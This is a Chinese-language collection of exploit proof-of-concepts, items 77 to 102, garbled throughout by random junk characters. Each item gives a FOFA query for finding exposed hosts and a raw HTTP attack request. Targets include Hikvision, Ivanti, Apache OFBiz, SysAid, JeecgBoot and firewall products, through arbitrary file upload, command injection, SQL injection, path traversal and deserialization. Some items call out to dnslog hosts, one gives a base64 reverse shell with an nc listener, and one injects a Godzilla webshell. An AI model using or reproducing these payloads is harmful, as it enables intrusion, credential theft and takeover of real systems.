1 G2 [. o; r2 ?6 J77. F22服装管理软件系统UploadHandler.ashx任意文件上传
FOFA：body="F22WEB登陆"
$ H. V3 B  b4 c3 F8 P3 C* xPOST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
9 i5 y5 n& h0 {  U6 C# }User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
8 i& D8 q4 ^; q& V# \2 \% h7 rConnection: close
* t! L# H! h) N6 w/ Q8 L% kContent-Length: 433
% |& Y+ G4 u2 i6 ~4 OAccept: */*
. w: {% E9 S" m- Y# i) MAccept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix
, Q& h! I. Q! X, _
------------398jnjVTTlDVXHlE7yYnfwBoix
: }1 G$ {4 U3 S* f' `8 [Content-Disposition: form-data; name="folder"
- R/ @/ |- P# F; b8 D8 h
/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
) ?! i+ K0 w5 R' u# ^- g8 ]' NContent-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream
5 T4 Q* r) L! I/ M! `* c
) F( M- i# s- h+ f0 Bhello1234567
9 |4 g7 k- }+ K/ Q* g! y. _# k0 A------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"
5 J9 \' z9 {6 X: i- [. ], e  n, @2 p
- K5 Q2 T% K4 G; m2 V7 e0 cSubmit Query
0 v, ^% b5 Q7 B! I: J. @3 i/ b------------398jnjVTTlDVXHlE7yYnfwBoix--
8 m& _( S% H% A7 _/ v' U

78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
0 _4 C$ p9 Y0 C5 @% N% @) ^FOFA：icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
: R/ L2 t' O: k3 X$ ~% n  |User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
! E% a7 n/ C" H3 @Connection: close
Content-Length: 336
Accept-Encoding: gzip
% d$ D; z1 i: f( ]. K# XContent-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l
4 \- S" i& I- {! ]1 B4 k3 Z- q
" s3 d5 U6 o8 S. z------YsOxWxSvj1KyZow1PTsh98fdu6l
6 P! }, p+ z4 D* e& Y, Y) pContent-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
$ _2 \' [3 w$ @3 p, y: CContent-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
( |& K! v6 l* j' j% ~4 i------YsOxWxSvj1KyZow1PTsh98fdu6l
# S, g, t, V# x! H( r6 R3 L9 l9 BContent-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
( ]0 i5 R$ Y, y5 F( \0 W! J) \------YsOxWxSvj1KyZow1PTsh98fdu6l--


9 e. h2 D0 |3 V0 @GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x


79. BYTEVALUE 百为流控路由器远程命令执行
FOFA：BYTEVALUE 智能流控路由器
& D  ~) p- F- j2 N- z0 BGET /goform/webRead/open/?path=|id HTTP/1.1
Host:IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
6 D( Y. |4 X! CAccept-Encoding: gzip, deflate
8 p& s9 _; x7 B( g! nConnection: close
+ Q* `! }( q- x4 ^4 b8 |Upgrade-Insecure-Requests: 1
+ @' J: Q* P! p( |1 C, M3 S

' V# m( ^! n1 r* i80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
  p2 Y( r( e  Y- o0 FFOFA：app="速达软件-公司产品"
9 k5 c- w+ F8 r9 b7 RPOST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
1 ~$ l2 t: M. L2 EHost: x.x.x.x
. e' {3 r6 j7 ]User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
! K# b1 L8 p8 [/ n! C4 nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
2 Z% K- ?0 H, r% Y& qAccept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
% J. \  Z' D7 q% T# i& M5 C: y! `Content-Type: application/octet-stream
8 x( B, C  \: R& |Upgrade-Insecure-Requests: 1
- E) C: i( u; N5 Z3 L) o
<% out.print("oessqeonylzaf");%>
& [+ N' I# k6 @5 v; {4 p
! X3 F4 j$ ]7 i6 s* R5 g  S
GET /xykqmfxpoas.jsp HTTP/1.1
+ d3 _! Z8 p# ]6 n9 ~( e& l1 E2 [9 pHost: x.x.x.x
- @* X6 E# |0 {# P! `# X8 N& g( K* cUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
* G6 T+ Y4 h% \) q$ p, J5 Z7 d2 J0 M0 dConnection: close
Accept-Encoding: gzip
/ M+ H0 V5 B" @4 ?- ]1 d1 ~

" t' l/ m& j/ c+ H" v81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
- o  C5 C, r. b+ P# L2 {FOFA：app="uniview-视频监控"
! W2 r9 d- [+ ^, j' \9 Y, eGET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
! U6 o6 N  l& F, k& S0 |0 UHost: x.x.x.x
* A+ f; U! h' k$ w' I2 HUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
4 X  T. M7 v- o% s, R  SConnection: close
8 v& M1 o* `% v  s5 N  x5 @Accept-Encoding: gzip
8 }# V& H5 J* |1 s7 h3 m) t. A" `; [: ?
0 I( m8 V- m! s9 J$ g& M3 s
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
, t+ |1 H% u; YFOFA：app="思福迪-LOGBASE"
( \# T5 w& j' ~' ]! ?POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
, L1 Q1 R& l" ?4 ^Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
" K) M% V5 ?2 o$ t2 \Referer: BaseURL
* v/ g* G- k3 K& |
# v& f' j) n) I, `  iz1=1&z2="|id;"&z3=bhost


! Q4 R4 k" L' d8 ?5 x- E3 @83. JeecgBoot testConnection 远程命令执行
* X( U- X# u+ g% ]( \FOFA：title=="JeecgBoot 企业级低代码平台"
3 U! p* u, C- f  y" W" L

POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
" g  T7 z2 a$ bUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
  \4 s0 L+ B! g; k! p$ t- OAccept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
4 j  c; G- n4 s5 Y$ HContent-Type: application/json

PAYLOAD

; }' V$ w# V- @3 Y  p& N5 E. t84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
FOFA：title=="JeecgBoot 企业级低代码平台"
7 G% B  A  y* l5 }
7 z, m2 _$ `8 `0 O; P

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
* ]7 A" j8 b, ^% U( O( s9 QUser-Agent: curl/7.88.1
1 U# ]* z: L8 }' h5 |" i+ rContent-Length: 156
Accept: */*
Connection: close
2 O1 A" ]+ d& u, _! x$ X0 c- j7 J/ n" U* P4 eContent-Type: application/json
$ v* T3 I% w1 |. x$ k1 YAccept-Encoding: gzip

( G+ Y2 T3 T+ E' a" e  u/ Y& E! H{
"sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
  "type": "0"
+ F! ~7 G) p( k0 r1 l2 ]}

. j( f1 P- U8 k: c, r4 h( Z% C
85. SysAid On-premise< 23.3.36远程代码执行
CVE-2023-47246
$ U8 a7 P! V  W. k# R* qFOFA：body="sysaid-logo-dark-green.png"
( v, Q) J% \5 ]. x/ p3 E: PEXP数据包如下，注入哥斯拉马
+ g% r2 [; ~$ F$ cPOST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
8 Q5 P& \/ F7 `8 o% V* |& {  ~User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD
2 s1 V3 Y) W/ D
1 w& Y0 U* U! n) |8 r5 t回显URL：http://x.x.x.x/userfiles/index.jsp
+ ~3 U+ @7 m9 c* E
86. 日本tosei自助洗衣机RCE
! g1 D3 s. o; R% HFOFA：body="tosei_login_check.php"
$ g6 m8 m' W1 j3 x+ R1 U" s/ TPOST /cgi-bin/network_test.php HTTP/1.1
1 k# g  y5 h0 z; w. wHost: x.x.x.x
* a! z1 ~; |! @+ D; K- pUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
, j3 `7 ~$ b1 K" y( W8 j7 I3 Q! }% IConnection: close
Content-Length: 44
1 l! ?: o7 s0 MAccept: */*
. u0 W& H5 K8 U4 AAccept-Encoding: gzip
# y, A; n. c$ F; t- o) n( l$ zAccept-Language: en
: Y1 T* w2 p; R" }2 S; T! T- jContent-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

4 ]) q; d. N2 _& I4 X
: r+ {8 @9 z' e) y87. 安恒明御安全网关aaa_local_web_preview文件上传
0 w  h0 P, d3 J( ]+ G: rFOFA：title="明御安全网关"
( w2 e( `& q* n- ^; r& Z& A8 OPOST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
, x0 t/ K8 X0 n' CHost: X.X.X.X
- @  P0 z, O6 B) e1 K: gUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
. x' _* x& T: }. C& E4 a$ j  LContent-Length: 198
Accept-Encoding: gzip
! Y- `5 {  e% pContent-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd
& L% f3 q' t9 o0 @6 q! g
--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain
4 D$ M# D7 }" q8 D1 N
5 u6 ~% p2 Z( z* k: G9 H2ZqGNnsjzzU2GBBPyd8AIA7QlDq
) ~% y- k. k3 o8 V5 X( \9 L3 x--qqobiandqgawlxodfiisporjwravxtvd--

8 m$ M. B8 e0 {0 H' q( s3 b' \$ q
) y0 C- e# M5 Z/jfhatuwe.php
" v  B# w" `6 v1 T' b' U6 E
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
FOFA：title="明御安全网关"
0 c, z$ ?! W7 {: X& ~3 NGET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.xx.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+ g7 D2 Y; `4 R8 C; {6 AAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
  L, t3 Y$ I" ^  FAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
: {- e5 T& Z0 `  \: S' \, d. e" Z

0 j% Z2 \% H. n/ \; r; {4 ~4 f/astdfkhl.php
" z+ p9 D' |" K2 S
89. 致远互联FE协作办公平台editflow_manager存在sql注入
FOFA：title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
/ Q8 J; A6 M: t9 e; {, C' E+ r% DAccept-Encoding: gzip

6 `. t! I4 O- [! Xoption=2&GUID=-1'+union+select+111*222--+

: r$ v7 T4 G6 u6 k0 |
- F! l& m& e. t8 ^/ c3 R90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
FOFA：icon_hash="-1830859634"
& r( p/ K- w- ~# Q4 pPOST /php/ping.php HTTP/1.1
Host: x.x.x.x
% S" [, P( p5 e) T' p. B+ ~  OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
' o) E; S+ @# L+ ^Content-Length: 51
4 b1 e! `! a8 F' ~- b4 G" a8 yAccept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
7 O9 v# q( e' w- ?. OAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
6 Y! v5 B% p5 F% L2 w- ~0 r' XX-Requested-With: XMLHttpRequest
$ Y7 h  E1 F0 d0 ?
jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig


91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
FOFA：title="综合安防管理平台"
: H- k( ^, `3 x' }GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
! b8 z$ q8 r0 b9 F8 ?5 K( hUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
, D+ D, f0 W; LAccept-Encoding: gzip, deflate
" W9 w9 `5 c+ `! l/ PAccept: */*
Connection: keep-alive
% S, u4 [3 h" p% f& e1 H$ H


92. 海康威视运行管理中心session命令执行
+ t7 E# f7 u( w: E* RFastjson命令执行
hunter：web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
: D. l* @$ X( P" ]8 GHost:
7 Z0 \; l9 F4 E- J$ w8 q( kAccept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
. w# o, W: C! h, V  r# ~4 \- S6 fX-Requested-With: XMLHttpRequest
8 l2 C# @' C  H$ {0 \9 x0 jContent-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
7 X/ k. P7 B5 ^User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778
; w5 j' h3 P/ p! i
PAYLOAD

. `  O6 p( @, E5 K( j
% F# ~5 o/ h( s1 ^* j9 E% r5 M93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
( b9 V1 C* w! P: p( @7 WFOFA：fid="1Lh1LHi6yfkhiO83I59AYg=="
, |+ C  @8 [2 w! A) f; uPOST /?g=app_av_import_save HTTP/1.1
+ c; p4 F5 y/ m; h1 {0 f: I. vHost: x.x.x.x
% n- ?' q8 ~4 ]Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
7 A9 C5 d5 y2 B
3 a' j1 f  r, a( f3 q6 G------WebKitFormBoundarykcbkgdfx
$ H. A( y) H' f. B& Q4 SContent-Disposition: form-data; name="MAX_FILE_SIZE"
7 \% S: H$ Y( w) F2 `
10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
% q( g+ b- s1 `! i8 ~" B" yContent-Type: text/plain
0 W7 q# H& P' G2 e
wagletqrkwrddkthtulxsqrphulnknxa
  K6 b$ k2 g% |5 a- ~- ]------WebKitFormBoundarykcbkgdfx
9 v' d' |# n1 b* k$ RContent-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

7 E& \" b$ a) ?  l7 X5 }1 r% H0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--
- k1 G7 L% Q, J5 ^0 t
7 p$ x3 N* E0 i: z4 b
+ B$ ]$ A2 k9 o  y8 W( D: \. g- t( aGET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
1 W! o5 G6 E6 H! E: ~User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36


94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
5 P+ \& h$ N( J9 n) D" E2 QFOFA：fid="1Lh1LHi6yfkhiO83I59AYg=="
0 s5 n9 u& l; u* a- c4 qPOST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
) Z+ S( y+ ~" O1 RContent-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

- r' M  {, M  P/ Q/ G------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"
7 i0 V% W- s: K6 b% }
3 [! c! b+ _: Z# i6 d* O10000000
, f5 V* m5 i; f! O/ I: C------WebKitFormBoundarybqvzqvmt
! G/ T/ `8 S- O" JContent-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain
$ h: H, e9 N& e/ N
& o; o* E$ @' Bpxplitttsrjnyoafavcajwkvhxindhmu
8 J) _; u  ]1 |% f8 i------WebKitFormBoundarybqvzqvmt
0 k& R# o& I, c8 Z9 GContent-Disposition: form-data; name="submit_post"

* s2 S/ y, I% Dobj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

) p' m6 R/ b5 B5 u0b9d6b1ab7479ab69d9f71b05e0e9445
6 E, u5 Q% F) Y8 t, V" H7 ^9 |------WebKitFormBoundarybqvzqvmt--
2 F/ g4 z7 K* U% z& M; y2 h- z5 X
& |) [$ b2 x* }. _, B! v2 c7 H
' P) Y/ r8 c+ z2 q& k$ O/ H0 h
+ p9 j2 k1 N- k9 b" c+ tGET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
9 O1 p* e: l  t) {4 ^6 N


: ]2 H- @. S* N95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
CVE-2023-49070
FOFA：app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
/ Q3 E& M0 e2 \9 p- [# D9 D; HConnection: close
( _8 q; t, q% @3 @Content-Length: 889
Content-Type: application/xml
# E( ~1 F" X% y0 \; B; dAccept-Encoding: gzip
% D0 z' O5 E  N' a. Z3 H
* A- C( u9 P8 x<?xml version="1.0"?>
<methodCall>
: X! y) p7 p7 }% D, a$ d" _% I   <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
    <params>
3 f; @7 w# L7 x% H0 l' p      <param>
  A# a$ ?( Y- ]  {      <value>
        <struct>
. P, {) I9 P# i# o4 c       <member>
  V6 B6 O& v- V3 g( h          <name>test</name>
          <value>
8 \0 J. k* M' k* V% B  ~: A3 g0 j3 `% T      <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>
          </value>
/ @: p& w( f( Z9 h! z2 [+ H        </member>
9 s: y- H+ k2 B9 m$ {! U$ j; ~9 n      </struct>
      </value>
" Y" \2 i  u9 r" P- {& I6 m, V    </param>
    </params>
</methodCall>
. o4 I7 s: @+ m* _4 J

用ysoserial生成payload
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"


! ]* u) ?6 R$ S' Q将生成的payload替换到上面的POC
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
1 [! `; |9 B1 qHost: 192.168.40.130:8443
  J( g& X" ]$ N( I' u" z7 t# g& qUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
9 Y: P6 f. f5 C( u) D# tContent-Type: application/xml
- t' |5 K5 H# x1 H, {Accept-Encoding: gzip
8 K4 A. P6 [: [8 K/ A
/ ?0 q/ _- R, p! FPAYLOAD
( V4 W( m' b) L5 v- w* V! B
96. Apache OFBiz  18.12.11 groovy 远程代码执行
FOFA：app="Apache_OFBiz"
# B: q% P9 a6 W5 {POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
, M- n( x* u) A) a$ g7 A+ wHost: localhost:8443
) h  O$ n' h+ ?0 R% O2 O0 N* lUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
) y- e1 t, k7 v0 |Accept: */*
5 E& R% Y! A. E& O& tAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
8 ]& a) m% I. i* ~4 Y0 z5 GContent-Type: application/x-www-form-urlencoded
/ Y$ M! _3 O( u" }. kContent-Length: 55

- n6 ~5 T1 u* B5 E2 X! ]3 r9 x# ZgroovyProgram=throw+new+Exception('id'.execute().text);

* s; A/ L  H& t+ Q- c( y
反弹shell
0 x& r  M$ {$ F6 g/ U! [在kali上启动一个监听
nc -lvp 7777
7 e* v& K$ x  X6 n5 F
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
0 h+ Z, ]$ @1 P- }+ jUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
% o" {6 `; e- h6 _& F, iContent-Type: application/x-www-form-urlencoded
# Y( r1 I  ]- H" |& {0 yContent-Length: 71
- [5 V# n; c9 N
2 t3 n+ z' m+ CgroovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
FOFA：body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
% |" d) H2 I7 I8 [: HGET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
# o; ?. k8 {! J4 _3 nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
. I8 ^" \2 Y! L* A6 |( i4 L- XAccept-Encoding: gzip
Connection: close
+ x) |: r( g$ a4 f0 F/ ZCookie: rememberMe=PAYLOAD
! z  X5 m8 K4 E9 f( l3 O# JX-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"
8 S4 F- T5 r. J! |" _( H8 a/ {

3 Z( O. S5 ^+ g- j+ e98. SpiderFlow爬虫平台远程命令执行
4 [- P+ F& w# sCVE-2024-0195
FOFA：app="SpiderFlow"
3 l3 M- }6 M; Z: DPOST /function/save HTTP/1.1
3 w; d3 j( k+ ?( C; DHost: 192.168.40.130:8088
& F9 F4 M" i3 F  e/ MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
1 ~2 `4 D! B+ O9 ^3 v# pContent-Length: 121
Accept: */*
# ]3 o  H& o2 K1 o" O6 l, ?Accept-Encoding: gzip, deflate
- w) I( T6 h9 z7 x9 `& }( HAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
' W/ ^$ {! o9 @5 f$ cContent-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
! X. O& a+ a' ^9 @+ |* Z$ N3 q
5 R4 Y/ r% H: [- @5 V2 v, a5 Yid=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B
' t  ]: \1 i  r2 f+ w+ a

, n  O0 @  U0 M: _# z  m99. Ncast盈可视高清智能录播系统busiFacade RCE
CVE-2024-0305
1 F4 l7 x) a9 Y3 |# V/ JFOFA：app="Ncast-产品" && title=="高清智能录播系统"
: U3 Y& m& M' KPOST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
; i6 W9 M1 E7 l3 o( t5 T$ v+ WConnection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
  t: ^1 R$ |& {' FAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
) n! O7 {# r8 }: D
%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D
2 t1 [* V  b: [. c& t5 @3 C3 J
, ~3 {1 S, t9 R% B
1 \6 t2 G7 X$ @0 {% R8 O6 J" Q100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
CVE-2024-0352
& n$ P) l+ Q3 T% l* g5 Q4 QFOFA：icon_hash="874152924"
% Y! d% P' C/ u9 v- ~; J+ {POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
/ }1 W, E. _9 I4 ~User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
" N6 v" A! i* }Connection: close
% s, W% N$ w6 m7 Z- ~Content-Length: 201
7 F3 g1 D  A6 }- HContent-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
# v+ B  J! b& V0 ?) i8 xAccept-Encoding: gzip
$ H0 R% L7 V( D4 z, V6 L" @% Y( t0 q
5 c& c: ]% y% C$ e- D------WebKitFormBoundarygcflwtei
, P$ C+ T/ f' [6 F4 @  Y+ J( n8 ?" dContent-Disposition: form-data; name="file";filename="IE4MGP.php"
! x0 ?& q' D: g7 Y# k( i4 nContent-Type: application/x-php

. q1 z: ?2 Z9 T0 h# d2 `9 L2ayyhRXiAsKXL8olvF5s4qqyI2O
6 d9 ~2 E/ D, t8 Z- h------WebKitFormBoundarygcflwtei--
% V, A1 B4 a( P) v7 g/ i
" g1 ]1 L" Q6 V% ^9 E
101. ivanti policy secure-22.6命令注入
; ~1 y, B- R' Z2 GCVE-2024-21887
FOFA：body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.xx.x.x.x
& [: Q! q/ s0 e8 P5 C; ^+ O1 L8 OUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
# Q  i3 i1 G" t* q; G1 A" mAccept-Encoding: gzip


9 t) }! r+ u3 W2 ?8 V! o( P8 s8 D9 {' G102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
